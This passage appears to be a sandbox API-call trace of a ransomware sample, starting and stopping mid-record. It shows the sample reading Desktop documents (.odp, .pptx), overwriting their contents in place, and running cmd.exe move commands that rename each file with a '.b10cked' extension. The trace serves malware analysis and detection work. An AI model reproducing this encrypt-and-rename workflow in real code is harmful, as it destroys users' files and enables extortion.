hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.615] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28540461559) returned 1 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.615] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.616] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13b9a [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.617] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x136b2 [0228.617] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13b9a [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13b9a [0228.618] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.619] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.619] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9dcc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.619] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.619] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9dcc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.619] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-40396, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9dce [0228.619] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9dcc, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.620] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-40396, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9dce [0228.620] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x9dcc, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x9dcc, lpOverlapped=0x0) returned 1 [0228.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SXGpQHv i4OFxmN5_1.odp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0228.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SXGpQHv i4OFxmN5_1.odp", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SXGpQHv i4OFxmN5_1.odp", lpUsedDefaultChar=0x0) returned 22 [0228.625] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13b9a [0228.625] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.625] CloseHandle (hObject=0x1b4) returned 1 [0228.626] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP") returned 0x25 [0228.626] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0228.627] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x910, dwThreadId=0x234)) returned 1 [0228.632] CloseHandle (hObject=0x120) returned 1 [0228.632] CloseHandle (hObject=0x1b4) returned 1 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\", cchLength=0x27 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\") returned 0x27 [0228.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\", cchCount2=39) returned 1 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0228.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0228.632] ReleaseMutex (hMutex=0xf8) returned 1 [0228.633] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx" (normalized: "c:\\users\\eebsym5\\desktop\\tdxt9-_3mym7ntn.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28542211715) returned 1 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x11556 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0228.633] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x11556 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0228.634] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1106e [0228.635] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x11556 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x11556 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0228.636] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.636] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8aaa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.637] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0228.637] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8aaa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.637] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-35498, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8aac [0228.637] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x8aaa, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.637] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-35498, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8aac [0228.637] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x8aaa, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x8aaa, lpOverlapped=0x0) returned 1 [0228.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tdxt9-_3mYM7NtN.pptx", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0228.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tdxt9-_3mYM7NtN.pptx", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tdxt9-_3mYM7NtN.pptx", lpUsedDefaultChar=0x0) returned 20 [0228.642] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x11556 [0228.642] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0228.642] CloseHandle (hObject=0x1b4) returned 1 [0228.643] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT") returned 0x25 [0228.644] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0228.644] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TDXT9-~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\Tdxt9-_3mYM7NtN.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, 